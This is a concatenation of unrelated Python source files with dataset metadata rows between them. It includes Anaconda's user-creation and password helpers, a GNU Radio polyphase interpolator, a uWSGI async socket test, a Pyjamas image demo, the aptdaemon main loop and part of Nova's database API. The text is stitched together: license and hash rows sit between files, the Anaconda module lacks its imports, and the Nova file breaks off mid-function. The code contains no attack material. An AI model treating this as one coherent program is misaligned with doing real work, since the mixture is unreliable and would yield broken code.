from pyanaconda.core.i18n import _
import re
from pyanaconda.anaconda_loggers import get_module_logger
log = get_module_logger(__name__)
def crypt_password(password):
"""Crypt a password.
Process a password with appropriate salted one-way algorithm.
:param str password: password to be crypted
:returns: crypted representation of the original password
:rtype: str
"""
cryptpw = crypt.crypt(password, crypt.METHOD_SHA512)
if cryptpw is None:
raise RuntimeError(_(
"Unable to encrypt password: unsupported "
"algorithm {}").format(crypt.METHOD_SHA512)
)
return cryptpw
def check_username(name):
"""Check if given username is valid.
:param: user or group name to check
:returns: a (success, translated-error-message) tuple
:rtype: (bool, str or None)
"""
# Check reserved names.
if name in os.listdir("/") + ["root", "home", "daemon", "system"]:
return False, _("User name is reserved for system: %s") % name
return is_valid_name(name)
def check_grouplist(group_list):
"""Check a group list for validity.
:param str group_list: a string representation of a group list to be checked
:returns: a (success, translated-error-message) tuple
:rtype: (bool, str or None)
"""
# Check empty list.
if group_list == "":
return True, None
# Check the group names.
for group_name in group_list.split(","):
valid, message = check_groupname(group_name.strip())
if not valid:
return valid, message
# Check the regexp to be sure
if not GROUPLIST_SIMPLE_VALID.match(group_list):
return False, _("Either a group name in the group list is invalid "
"or groups are not separated by a comma.")
return True, None
def check_groupname(name):
"""Check if group name is valid.
:param: group name to check
:returns: a (success, translated-error-message) tuple
:rtype: (bool, str or None)
"""
return is_valid_name(name)
def is_valid_name(name):
"""Check if given name is valid for either a group or user.
This method basically checks all the rules that are the same
for both user and group names.
There is a separate check_username() method, that adds some
username specific checks on top of this.
:param: user or group name to check
:returns: a (success, translated-error-message) tuple
:rtype: (bool, str or None)
"""
# Check shadow-utils rules.
if name.startswith("-"):
return False, _("Name cannot start with '-' character.")
if name in [".", ".."]:
return False, _("Name '%s' is not allowed.") % name
if name.isdigit():
return False, _("Fully numeric name is not allowed.")
# Final '$' allowed for Samba
if name == "$":
return False, _("Name '$' is not allowed.")
if name.endswith("$"):
sname = name[:-1]
else:
sname = name
match = re.search(r'[^' + PORTABLE_FS_CHARS + r']', sname)
if match:
return False, _("Name cannot contain character: '%s'") % match.group()
if len(name) > 32:
return False, _("Name must be shorter than 33 characters.")
# Check also with THE regexp to be sure
if not NAME_VALID.match(name):
return False, _("Name '%s' is invalid.") % name
return True, None
def guess_username(fullname):
"""Guess username from full user name.
:param str fullname: full user name
:returns: guessed, hopefully suitable, username
:rtype: str
"""
fullname = fullname.split()
# use last name word (at the end in most of the western countries..)
if len(fullname) > 0:
username = fullname[-1].lower()
else:
username = u""
# and prefix it with the first name initial
if len(fullname) > 1:
username = fullname[0][0].lower() + username
username = strip_accents(username)
return username
def _getpwnam(user_name, root):
"""Like pwd.getpwnam, but is able to use a different root.
Also just returns the pwd structure as a list, because of laziness.
:param str user_name: user name
:param str root: filesystem root for the operation
"""
with open(root + "/etc/passwd", "r") as f:
for line in f:
fields = line.split(":")
if fields[0] == user_name:
return fields
return None
def _getgrnam(group_name, root):
"""Like grp.getgrnam, but able to use a different root.
Just returns the grp structure as a list, same reason as above.
:param str group_name: group name
:param str root: filesystem root for the operation
"""
with open(root + "/etc/group", "r") as f:
for line in f:
fields = line.split(":")
if fields[0] == group_name:
return fields
return None
def _getgrgid(gid, root):
"""Like grp.getgrgid, but able to use a different root.
Just returns the fields as a list of strings.
:param int git: group id
:param str root: filesystem root for the operation
"""
# Convert the probably-int GID to a string
gid = str(gid)
with open(root + "/etc/group", "r") as f:
for line in f:
fields = line.split(":")
if fields[2] == gid:
return fields
return None
@contextmanager
def _ensure_login_defs(root):
"""Runs a command after creating /etc/login.defs, if necessary.
The groupadd and useradd utilities need login.defs to exist in the chroot,
and if someone is doing a cloud image install or some kind of --nocore thing
it may not. An empty one is ok, though. If it's missing, create it,
run the command, then clean it up.
:param str root: filesystem root for the operation
"""
login_defs_path = root + '/etc/login.defs'
if not os.path.exists(login_defs_path):
open(login_defs_path, "w").close()
login_defs_created = True
else:
login_defs_created = False
yield
if login_defs_created:
os.unlink(login_defs_path)
def create_group(group_name, gid=None, root=None):
"""Create a new user on the system with the given name.
:param int gid: The GID for the new user. If none is given, the next available one is used.
:param str root: The directory of the system to create the new user in.
homedir will be interpreted relative to this. Defaults
to conf.target.system_root.
"""
if root is None:
root = conf.target.system_root
if _getgrnam(group_name, root):
raise ValueError("Group %s already exists" % group_name)
args = ["-R", root]
if gid is not None:
args.extend(["-g", str(gid)])
args.append(group_name)
with _ensure_login_defs(root):
status = util.execWithRedirect("groupadd", args)
if status == 4:
raise ValueError("GID %s already exists" % gid)
elif status == 9:
raise ValueError("Group %s already exists" % group_name)
elif status != 0:
raise OSError("Unable to create group %s: status=%s" % (group_name, status))
def create_user(username, password=False, is_crypted=False, lock=False,
homedir=None, uid=None, gid=None, groups=None, shell=None, gecos="",
root=None):
"""Create a new user on the system with the given name.
:param str username: The username for the new user to be created.
:param str password: The password. See is_crypted for how this is interpreted.
If the password is "" then the account is created
with a blank password. If None or False the account will
be left in its initial state (locked)
:param bool is_crypted: Is the password already encrypted? Defaults to False.
:param bool lock: Is the new account locked by default?
Defaults to False.
:param str homedir: The home directory for the new user.
Defaults to /home/<name>.
:param int uid: The UID for the new user.
If none is given, the next available one is used.
:param int gid: The GID for the new user.
If none is given, the next available one is used.
:param groups: A list of group names the user should be added to.
Each group name can contain an optional GID in parenthesis,
such as "groupName(5000)".
Defaults to [].
:type groups: list of str
:param str shell: The shell for the new user.
If none is given, the login.defs default is used.
:param str gecos: The GECOS information (full name, office, phone, etc.).
Defaults to "".
:param str root: The directory of the system to create the new user in.
The homedir option will be interpreted relative to this.
Defaults to conf.target.system_root.
"""
# resolve the optional arguments that need a default that can't be
# reasonably set in the function signature
if not homedir:
homedir = "/home/" + username
if groups is None:
groups = []
if root is None:
root = conf.target.system_root
if check_user_exists(username, root):
raise ValueError("User %s already exists" % username)
args = ["-R", root]
# Split the groups argument into a list of (username, gid or None) tuples
# the gid, if any, is a string since that makes things simpler
group_gids = [GROUPLIST_FANCY_PARSE.match(group).groups() for group in groups]
# If a specific gid is requested:
# - check if a group already exists with that GID. i.e., the user's
# GID should refer to a system group, such as users. If so, just set
# the GID.
# - check if a new group is requested with that GID. If so, set the GID
# and let the block below create the actual group.
# - if neither of those are true, create a new user group with the requested
# GID
# otherwise use -U to create a new user group with the next available GID.
if gid:
if not _getgrgid(gid, root) and not any(one_gid[1] == str(gid) for one_gid in group_gids):
create_group(username, gid=gid, root=root)
args.extend(['-g', str(gid)])
else:
args.append('-U')
# If any requested groups do not exist, create them.
group_list = []
for group_name, gid in group_gids:
existing_group = _getgrnam(group_name, root)
# Check for a bad GID request
if gid and existing_group and gid != existing_group[2]:
raise ValueError("Group %s already exists with GID %s" % (group_name, gid))
# Otherwise, create the group if it does not already exist
if not existing_group:
create_group(group_name, gid=gid, root=root)
group_list.append(group_name)
if group_list:
args.extend(['-G', ",".join(group_list)])
# useradd expects the parent directory tree to exist.
parent_dir = util.parent_dir(root + homedir)
# If root + homedir came out to "/", such as if we're creating the sshpw user,
# parent_dir will be empty. Don't create that.
if parent_dir:
util.mkdirChain(parent_dir)
args.extend(["-d", homedir])
# Check whether the directory exists or if useradd should create it
mk_homedir = not os.path.exists(root + homedir)
if mk_homedir:
args.append("-m")
else:
args.append("-M")
if shell:
args.extend(["-s", shell])
if uid:
args.extend(["-u", str(uid)])
if gecos:
args.extend(["-c", gecos])
args.append(username)
with _ensure_login_defs(root):
status = util.execWithRedirect("useradd", args)
if status == 4:
raise ValueError("UID %s already exists" % uid)
elif status == 6:
raise ValueError("Invalid groups %s" % groups)
elif status == 9:
raise ValueError("User %s already exists" % username)
elif status != 0:
raise OSError("Unable to create user %s: status=%s" % (username, status))
if not mk_homedir:
try:
stats = os.stat(root + homedir)
orig_uid = stats.st_uid
orig_gid = stats.st_gid
# Get the UID and GID of the created user
pwent = _getpwnam(username, root)
log.info("Home directory for the user %s already existed, "
"fixing the owner and SELinux context.", username)
# home directory already existed, change owner of it properly
util.chown_dir_tree(root + homedir,
int(pwent[2]), int(pwent[3]),
orig_uid, orig_gid)
util.execWithRedirect("restorecon", ["-r", root + homedir])
except OSError as e:
log.critical("Unable to change owner of existing home directory: %s", e.strerror)
raise
set_user_password(username, password, is_crypted, lock, root)
def check_user_exists(username, root=None):
"""Check a user exists.
:param str username: username to check
:param str root: target system sysroot path
"""
if root is None:
root = conf.target.system_root
if _getpwnam(username, root):
return True
return False
def set_user_password(username, password, is_crypted, lock, root="/"):
"""Set user password.
:param str username: username of the user
:param str password: user password
:param bool is_crypted: is the password already crypted ?
:param bool lock: should the password for this username be locked ?
:param str root: target system sysroot path
"""
# Only set the password if it is a string, including the empty string.
# Otherwise leave it alone (defaults to locked for new users) and reset sp_lstchg
if password or password == "":
if password == "":
log.info("user account %s setup with no password", username)
elif not is_crypted:
password = crypt_password(password)
if lock:
password = "!" + password
log.info("user account %s locked", username)
proc = util.startProgram(["chpasswd", "-R", root, "-e"], stdin=subprocess.PIPE)
proc.communicate(("%s:%s\n" % (username, password)).encode("utf-8"))
if proc.returncode != 0:
raise OSError("Unable to set password for new user: status=%s" % proc.returncode)
# Reset sp_lstchg to an empty string. On systems with no rtc, this
# field can be set to 0, which has a special meaning that the password
# must be reset on the next login.
util.execWithRedirect("chage", ["-R", root, "-d", "", username])
def set_root_password(password, is_crypted=False, lock=False, root="/"):
"""Set root password.
:param str password: root password
:param bool is_crypted: is the password already crypted ?
:param bool lock: should the root password be locked ?
:param str root: target system sysroot path
"""
return set_user_password("root", password, is_crypted, lock, root)
def set_user_ssh_key(username, key, root=None):
"""Set an SSH key for a given username.
:param str username: a username
:param str key: the SSH key to set
:param str root: target system sysroot path
"""
if root is None:
root = conf.target.system_root
pwent = _getpwnam(username, root)
if not pwent:
raise ValueError("set_user_ssh_key: user %s does not exist" % username)
homedir = root + pwent[5]
if not os.path.exists(homedir):
log.error("set_user_ssh_key: home directory for %s does not exist", username)
raise ValueError("set_user_ssh_key: home directory for %s does not exist" % username)
uid = pwent[2]
gid = pwent[3]
sshdir = os.path.join(homedir, ".ssh")
if not os.path.isdir(sshdir):
os.mkdir(sshdir, 0o700)
os.chown(sshdir, int(uid), int(gid))
authfile = os.path.join(sshdir, "authorized_keys")
authfile_existed = os.path.exists(authfile)
with util.open_with_perm(authfile, "a", 0o600) as f:
f.write(key + "\n")
# Only change ownership if we created it
if not authfile_existed:
os.chown(authfile, int(uid), int(gid))
util.execWithRedirect("restorecon", ["-r", sshdir])
| gpl-2.0 | 4,420,711,798,531,218,000 | 32.412098 | 112 | 0.628006 | false |
jasimpson/gnuradio-jasimpson | gnuradio-core/src/python/gnuradio/blks2impl/pfb_interpolator.py | 10 | 2640 | #!/usr/bin/env python
#
# Copyright 2009 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, optfir
class pfb_interpolator_ccf(gr.hier_block2):
'''
Make a Polyphase Filter interpolator (complex in, complex out, floating-point taps)
The block takes a single complex stream in and outputs a single complex
stream out. As such, it requires no extra glue to handle the input/output
streams. This block is provided to be consistent with the interface to the
other PFB block.
'''
def __init__(self, interp, taps=None, atten=100):
gr.hier_block2.__init__(self, "pfb_interpolator_ccf",
gr.io_signature(1, 1, gr.sizeof_gr_complex), # Input signature
gr.io_signature(1, 1, gr.sizeof_gr_complex)) # Output signature
self._interp = interp
self._taps = taps
if taps is not None:
self._taps = taps
else:
# Create a filter that covers the full bandwidth of the input signal
bw = 0.4
tb = 0.2
ripple = 0.99
made = False
while not made:
try:
self._taps = optfir.low_pass(self._interp, self._interp, bw, bw+tb, ripple, atten)
made = True
except RuntimeError:
ripple += 0.01
made = False
print("Warning: set ripple to %.4f dB. If this is a problem, adjust the attenuation or create your own filter taps." % (ripple))
# Build in an exit strategy; if we've come this far, it ain't working.
if(ripple >= 1.0):
raise RuntimeError("optfir could not generate an appropriate filter.")
self.pfb = gr.pfb_interpolator_ccf(self._interp, self._taps)
self.connect(self, self.pfb)
self.connect(self.pfb, self)
| gpl-3.0 | -436,305,110,298,403,840 | 36.714286 | 148 | 0.624621 | false |
tachang/uwsgi | tests/iobound_async_unix.py | 13 | 1085 | import socket
import select
import errno
import struct
def send_request(env, client):
client.setblocking(1)
data = "hello world\r\n"
# send uwsgi-echo header
client.send(struct.pack('<BHB', 101, len(data), 0))
# send body
client.send(data)
while 1:
yield env['x-wsgiorg.fdevent.readable'](client.fileno(), 10)
buf = client.recv(4096)
if len(buf) == 0:
break
else:
yield buf
def application(env, start_response):
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.setblocking(0)
#env['x-wsgiorg.fdevent.readable'] = lambda fd,t: ""
#env['x-wsgiorg.fdevent.writable'] = lambda fd,t: ""
#yield ""
c = s.connect_ex('echo.sock')
if c == errno.EINPROGRESS:
yield env['x-wsgiorg.fdevent.writable'](s.fileno(), 10)
for r in send_request(env, s):
yield r
elif c == errno.EISCONN or c == 0:
start_response('200 Ok', [ ('Content-Type', 'text/plain')])
for r in send_request(env, s):
yield r
else:
print c
start_response( '500 Internal Server Error', [ ('Content-Type', 'text/plain')])
yield "Internal Server Error"
s.close()
| gpl-2.0 | -8,210,998,493,778,553,000 | 20.27451 | 81 | 0.661751 | false |
jaredly/pyjamas | examples/showcase/src/demos_widgets/image.py | 13 | 1339 | """
The ``ui.Image`` class is used to display an image.
The ``Image`` class can display any image that is specified by a URL. This can
be an image stored somewhere on the internet, or alternatively you can store an
image in the "public" directory within your application's source folder, and
then access it using a relative URL, as shown below.
In this example, the image file named "myImage.jpg" is stored inside the
"images" sub-directory, which is in the "public" directory within the
application's main source directory.
As well as passing the image URL to the initialiser, you can call ``setURL()``
to change the image being displayed at any time. You can also call
``addClickListener()`` to add a listener function to be called when the user
clicks on the image.
"""
from pyjamas.ui.SimplePanel import SimplePanel
from pyjamas.ui.Image import Image
from pyjamas import Window
class ImageDemo(SimplePanel):
def __init__(self):
SimplePanel.__init__(self)
# We display the "myImage.jpg" file, stored in the "public/images"
# directory, where "public" is in the application's source directory.
img = Image("images/myImage.jpg")
img.addClickListener(getattr(self, "onImageClicked"))
self.add(img)
def onImageClicked(self, sender=None):
Window.alert("Stop that!")
| apache-2.0 | 7,667,374,826,102,297,000 | 36.194444 | 79 | 0.725168 | false |
ruibarreira/linuxtrail | usr/lib/python2.7/dist-packages/aptdaemon/loop.py | 3 | 1103 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Main loop for aptdaemon."""
# Copyright (C) 2008-2009 Sebastian Heinlein <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
__author__ = "Sebastian Heinlein <[email protected]>"
__all__ = ("mainloop", "get_main_loop")
from gi.repository import GLib
mainloop = GLib.MainLoop()
def get_main_loop():
"""Return the gobject main loop as a singelton."""
return mainloop
# vim:ts=4:sw=4:et
| gpl-3.0 | 5,058,937,457,367,417,000 | 32.424242 | 73 | 0.729828 | false |
BeyondTheClouds/nova | nova/db/sqlalchemy/api.py | 2 | 247898 | # Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of SQLAlchemy backend."""
import collections
import copy
import datetime
import functools
import inspect
import sys
import uuid
from oslo_config import cfg
from oslo_db import api as oslo_db_api
from oslo_db import exception as db_exc
from oslo_db import options as oslo_db_options
from oslo_db.sqlalchemy import enginefacade
from oslo_db.sqlalchemy import update_match
from oslo_db.sqlalchemy import utils as sqlalchemyutils
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
from six.moves import range
import sqlalchemy as sa
from sqlalchemy import and_
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy import MetaData
from sqlalchemy import or_
from sqlalchemy.orm import aliased
from sqlalchemy.orm import contains_eager
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import joinedload_all
from sqlalchemy.orm import noload
from sqlalchemy.orm import undefer
from sqlalchemy.schema import Table
from sqlalchemy import sql
from sqlalchemy.sql.expression import asc
from sqlalchemy.sql.expression import desc
from sqlalchemy.sql import false
from sqlalchemy.sql import func
from sqlalchemy.sql import null
from sqlalchemy.sql import true
from nova import block_device
from nova.compute import task_states
from nova.compute import vm_states
import nova.context
from nova.db.sqlalchemy import models
from nova import exception
from nova.i18n import _, _LI, _LE, _LW
from nova.objects import fields
from nova import quota
from nova import safe_utils
db_opts = [
cfg.StrOpt('osapi_compute_unique_server_name_scope',
default='',
help='When set, compute API will consider duplicate hostnames '
'invalid within the specified scope, regardless of case. '
'Should be empty, "project" or "global".'),
]
api_db_opts = [
cfg.StrOpt('connection',
help='The SQLAlchemy connection string to use to connect to '
'the Nova API database.',
secret=True),
cfg.BoolOpt('sqlite_synchronous',
default=True,
help='If True, SQLite uses synchronous mode.'),
cfg.StrOpt('slave_connection',
secret=True,
help='The SQLAlchemy connection string to use to connect to the'
' slave database.'),
cfg.StrOpt('mysql_sql_mode',
default='TRADITIONAL',
help='The SQL mode to be used for MySQL sessions. '
'This option, including the default, overrides any '
'server-set SQL mode. To use whatever SQL mode '
'is set by the server configuration, '
'set this to no value. Example: mysql_sql_mode='),
cfg.IntOpt('idle_timeout',
default=3600,
help='Timeout before idle SQL connections are reaped.'),
cfg.IntOpt('max_pool_size',
help='Maximum number of SQL connections to keep open in a '
'pool.'),
cfg.IntOpt('max_retries',
default=10,
help='Maximum number of database connection retries '
'during startup. Set to -1 to specify an infinite '
'retry count.'),
cfg.IntOpt('retry_interval',
default=10,
help='Interval between retries of opening a SQL connection.'),
cfg.IntOpt('max_overflow',
help='If set, use this value for max_overflow with '
'SQLAlchemy.'),
cfg.IntOpt('connection_debug',
default=0,
help='Verbosity of SQL debugging information: 0=None, '
'100=Everything.'),
cfg.BoolOpt('connection_trace',
default=False,
help='Add Python stack traces to SQL as comment strings.'),
cfg.IntOpt('pool_timeout',
help='If set, use this value for pool_timeout with '
'SQLAlchemy.'),
]
CONF = cfg.CONF
CONF.register_opts(db_opts)
CONF.register_opts(oslo_db_options.database_opts, 'database')
CONF.register_opts(api_db_opts, group='api_database')
CONF.import_opt('until_refresh', 'nova.quota')
LOG = logging.getLogger(__name__)
main_context_manager = enginefacade.transaction_context()
api_context_manager = enginefacade.transaction_context()
def _get_db_conf(conf_group, connection=None):
kw = dict(
connection=connection or conf_group.connection,
slave_connection=conf_group.slave_connection,
sqlite_fk=False,
__autocommit=True,
expire_on_commit=False,
mysql_sql_mode=conf_group.mysql_sql_mode,
idle_timeout=conf_group.idle_timeout,
connection_debug=conf_group.connection_debug,
max_pool_size=conf_group.max_pool_size,
max_overflow=conf_group.max_overflow,
pool_timeout=conf_group.pool_timeout,
sqlite_synchronous=conf_group.sqlite_synchronous,
connection_trace=conf_group.connection_trace,
max_retries=conf_group.max_retries,
retry_interval=conf_group.retry_interval)
return kw
def _context_manager_from_context(context):
if context:
try:
return context.db_connection
except AttributeError:
pass
def configure(conf):
main_context_manager.configure(**_get_db_conf(conf.database))
api_context_manager.configure(**_get_db_conf(conf.api_database))
def create_context_manager(connection=None):
"""Create a database context manager object.
: param connection: The database connection string
"""
ctxt_mgr = enginefacade.transaction_context()
ctxt_mgr.configure(**_get_db_conf(CONF.database, connection=connection))
return ctxt_mgr
def get_context_manager(context):
"""Get a database context manager object.
:param context: The request context that can contain a context manager
"""
return _context_manager_from_context(context) or main_context_manager
def get_engine(use_slave=False, context=None):
"""Get a database engine object.
:param use_slave: Whether to use the slave connection
:param context: The request context that can contain a context manager
"""
ctxt_mgr = _context_manager_from_context(context) or main_context_manager
return ctxt_mgr.get_legacy_facade().get_engine(use_slave=use_slave)
def get_api_engine():
return api_context_manager.get_legacy_facade().get_engine()
_SHADOW_TABLE_PREFIX = 'shadow_'
_DEFAULT_QUOTA_NAME = 'default'
PER_PROJECT_QUOTAS = ['fixed_ips', 'floating_ips', 'networks']
def get_backend():
"""The backend is this module itself."""
return sys.modules[__name__]
def require_context(f):
"""Decorator to require *any* user or admin context.
This does no authorization for user or project access matching, see
:py:func:`nova.context.authorize_project_context` and
:py:func:`nova.context.authorize_user_context`.
The first argument to the wrapped function must be the context.
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
nova.context.require_context(args[0])
return f(*args, **kwargs)
return wrapper
def require_instance_exists_using_uuid(f):
"""Decorator to require the specified instance to exist.
Requires the wrapped function to use context and instance_uuid as
their first two arguments.
"""
@functools.wraps(f)
def wrapper(context, instance_uuid, *args, **kwargs):
instance_get_by_uuid(context, instance_uuid)
return f(context, instance_uuid, *args, **kwargs)
return wrapper
def require_aggregate_exists(f):
"""Decorator to require the specified aggregate to exist.
Requires the wrapped function to use context and aggregate_id as
their first two arguments.
"""
@functools.wraps(f)
def wrapper(context, aggregate_id, *args, **kwargs):
aggregate_get(context, aggregate_id)
return f(context, aggregate_id, *args, **kwargs)
return wrapper
def select_db_reader_mode(f):
"""Decorator to select synchronous or asynchronous reader mode.
The kwarg argument 'use_slave' defines reader mode. Asynchronous reader
will be used if 'use_slave' is True and synchronous reader otherwise.
If 'use_slave' is not specified default value 'False' will be used.
Wrapped function must have a context in the arguments.
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
wrapped_func = safe_utils.get_wrapped_function(f)
keyed_args = inspect.getcallargs(wrapped_func, *args, **kwargs)
context = keyed_args['context']
use_slave = keyed_args.get('use_slave', False)
if use_slave:
reader_mode = main_context_manager.async
else:
reader_mode = main_context_manager.reader
with reader_mode.using(context):
return f(*args, **kwargs)
return wrapper
def pick_context_manager_writer(f):
"""Decorator to use a writer db context manager.
The db context manager will be picked from the RequestContext.
Wrapped function must have a RequestContext in the arguments.
"""
@functools.wraps(f)
def wrapped(context, *args, **kwargs):
ctxt_mgr = get_context_manager(context)
with ctxt_mgr.writer.using(context):
return f(context, *args, **kwargs)
return wrapped
def pick_context_manager_reader(f):
"""Decorator to use a reader db context manager.
The db context manager will be picked from the RequestContext.
Wrapped function must have a RequestContext in the arguments.
"""
@functools.wraps(f)
def wrapped(context, *args, **kwargs):
ctxt_mgr = get_context_manager(context)
with ctxt_mgr.reader.using(context):
return f(context, *args, **kwargs)
return wrapped
def pick_context_manager_reader_allow_async(f):
"""Decorator to use a reader.allow_async db context manager.
The db context manager will be picked from the RequestContext.
Wrapped function must have a RequestContext in the arguments.
"""
@functools.wraps(f)
def wrapped(context, *args, **kwargs):
ctxt_mgr = get_context_manager(context)
with ctxt_mgr.reader.allow_async.using(context):
return f(context, *args, **kwargs)
return wrapped
def model_query(context, model,
args=None,
read_deleted=None,
project_only=False):
"""Query helper that accounts for context's `read_deleted` field.
:param context: NovaContext of the query.
:param model: Model to query. Must be a subclass of ModelBase.
:param args: Arguments to query. If None - model is used.
:param read_deleted: If not None, overrides context's read_deleted field.
Permitted values are 'no', which does not return
deleted values; 'only', which only returns deleted
values; and 'yes', which does not filter deleted
values.
:param project_only: If set and context is user-type, then restrict
query to match the context's project_id. If set to
'allow_none', restriction includes project_id = None.
"""
if read_deleted is None:
read_deleted = context.read_deleted
query_kwargs = {}
if 'no' == read_deleted:
query_kwargs['deleted'] = False
elif 'only' == read_deleted:
query_kwargs['deleted'] = True
elif 'yes' == read_deleted:
pass
else:
raise ValueError(_("Unrecognized read_deleted value '%s'")
% read_deleted)
query = sqlalchemyutils.model_query(
model, context.session, args, **query_kwargs)
# We can't use oslo.db model_query's project_id here, as it doesn't allow
# us to return both our projects and unowned projects.
if nova.context.is_user_context(context) and project_only:
if project_only == 'allow_none':
query = query.\
filter(or_(model.project_id == context.project_id,
model.project_id == null()))
else:
query = query.filter_by(project_id=context.project_id)
return query
def convert_objects_related_datetimes(values, *datetime_keys):
if not datetime_keys:
datetime_keys = ('created_at', 'deleted_at', 'updated_at')
for key in datetime_keys:
if key in values and values[key]:
if isinstance(values[key], six.string_types):
try:
values[key] = timeutils.parse_strtime(values[key])
except ValueError:
# Try alternate parsing since parse_strtime will fail
# with say converting '2015-05-28T19:59:38+00:00'
values[key] = timeutils.parse_isotime(values[key])
# NOTE(danms): Strip UTC timezones from datetimes, since they're
# stored that way in the database
values[key] = values[key].replace(tzinfo=None)
return values
def _sync_instances(context, project_id, user_id):
return dict(zip(('instances', 'cores', 'ram'),
_instance_data_get_for_user(context, project_id, user_id)))
def _sync_floating_ips(context, project_id, user_id):
return dict(floating_ips=_floating_ip_count_by_project(
context, project_id))
def _sync_fixed_ips(context, project_id, user_id):
return dict(fixed_ips=_fixed_ip_count_by_project(context, project_id))
def _sync_security_groups(context, project_id, user_id):
return dict(security_groups=_security_group_count_by_project_and_user(
context, project_id, user_id))
def _sync_server_groups(context, project_id, user_id):
return dict(server_groups=_instance_group_count_by_project_and_user(
context, project_id, user_id))
QUOTA_SYNC_FUNCTIONS = {
'_sync_instances': _sync_instances,
'_sync_floating_ips': _sync_floating_ips,
'_sync_fixed_ips': _sync_fixed_ips,
'_sync_security_groups': _sync_security_groups,
'_sync_server_groups': _sync_server_groups,
}
###################
def constraint(**conditions):
return Constraint(conditions)
def equal_any(*values):
return EqualityCondition(values)
def not_equal(*values):
return InequalityCondition(values)
class Constraint(object):
def __init__(self, conditions):
self.conditions = conditions
def apply(self, model, query):
for key, condition in self.conditions.items():
for clause in condition.clauses(getattr(model, key)):
query = query.filter(clause)
return query
class EqualityCondition(object):
def __init__(self, values):
self.values = values
def clauses(self, field):
# method signature requires us to return an iterable even if for OR
# operator this will actually be a single clause
return [or_(*[field == value for value in self.values])]
class InequalityCondition(object):
def __init__(self, values):
self.values = values
def clauses(self, field):
return [field != value for value in self.values]
###################
@pick_context_manager_writer
def service_destroy(context, service_id):
service = service_get(context, service_id)
model_query(context, models.Service).\
filter_by(id=service_id).\
soft_delete(synchronize_session=False)
# TODO(sbauza): Remove the service_id filter in a later release
# once we are sure that all compute nodes report the host field
model_query(context, models.ComputeNode).\
filter(or_(models.ComputeNode.service_id == service_id,
models.ComputeNode.host == service['host'])).\
soft_delete(synchronize_session=False)
@pick_context_manager_reader
def service_get(context, service_id):
query = model_query(context, models.Service).filter_by(id=service_id)
result = query.first()
if not result:
raise exception.ServiceNotFound(service_id=service_id)
return result
@pick_context_manager_reader_allow_async
def service_get_minimum_version(context, binary):
min_version = context.session.query(
func.min(models.Service.version)).\
filter(models.Service.binary == binary).\
filter(models.Service.forced_down == false()).\
scalar()
return min_version
@pick_context_manager_reader
def service_get_all(context, disabled=None):
query = model_query(context, models.Service)
if disabled is not None:
query = query.filter_by(disabled=disabled)
return query.all()
@pick_context_manager_reader
def service_get_all_by_topic(context, topic):
return model_query(context, models.Service, read_deleted="no").\
filter_by(disabled=False).\
filter_by(topic=topic).\
all()
@pick_context_manager_reader
def service_get_by_host_and_topic(context, host, topic):
return model_query(context, models.Service, read_deleted="no").\
filter_by(disabled=False).\
filter_by(host=host).\
filter_by(topic=topic).\
first()
@pick_context_manager_reader
def service_get_all_by_binary(context, binary, include_disabled=False):
query = model_query(context, models.Service, read_deleted="no").\
filter_by(binary=binary)
if not include_disabled:
query = query.filter_by(disabled=False)
return query.all()
@pick_context_manager_reader
def service_get_by_host_and_binary(context, host, binary):
result = model_query(context, models.Service, read_deleted="no").\
filter_by(host=host).\
filter_by(binary=binary).\
first()
if not result:
raise exception.HostBinaryNotFound(host=host, binary=binary)
return result
@pick_context_manager_reader
def service_get_all_by_host(context, host):
return model_query(context, models.Service, read_deleted="no").\
filter_by(host=host).\
all()
@pick_context_manager_reader_allow_async
def service_get_by_compute_host(context, host):
result = model_query(context, models.Service, read_deleted="no").\
filter_by(host=host).\
filter_by(binary='nova-compute').\
first()
if not result:
raise exception.ComputeHostNotFound(host=host)
return result
@pick_context_manager_writer
def service_create(context, values):
service_ref = models.Service()
service_ref.update(values)
if not CONF.enable_new_services:
service_ref.disabled = True
try:
service_ref.save(context.session)
except db_exc.DBDuplicateEntry as e:
if 'binary' in e.columns:
raise exception.ServiceBinaryExists(host=values.get('host'),
binary=values.get('binary'))
raise exception.ServiceTopicExists(host=values.get('host'),
topic=values.get('topic'))
return service_ref
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def service_update(context, service_id, values):
service_ref = service_get(context, service_id)
# Only servicegroup.drivers.db.DbDriver._report_state() updates
# 'report_count', so if that value changes then store the timestamp
# as the last time we got a state report.
if 'report_count' in values:
if values['report_count'] > service_ref.report_count:
